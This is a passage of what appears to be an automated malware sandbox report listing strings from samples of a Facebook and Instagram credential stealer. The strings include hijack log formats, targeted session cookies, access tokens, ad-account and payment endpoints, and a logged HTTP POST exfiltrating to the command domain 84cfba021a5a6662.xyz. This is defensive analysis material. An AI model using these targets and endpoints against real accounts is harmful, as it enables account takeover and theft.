text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comT equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comf equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.phpbo\\O9 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/D
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/al
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/alD
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/f
Source: 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/r
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: 56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wV
Source: 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wd_kb_0x
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llH
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llr
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz//fine/send
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/eV
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377366859.0000000000593000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/w
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wI
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wvx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpString found in binary or memory: http://charlesproxy.com/ssl
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exeString found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjIwZTg0ZTY4NTUwZTU4OGJhMzFmNmI5YjE4N2E4NDAyZWVmO
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
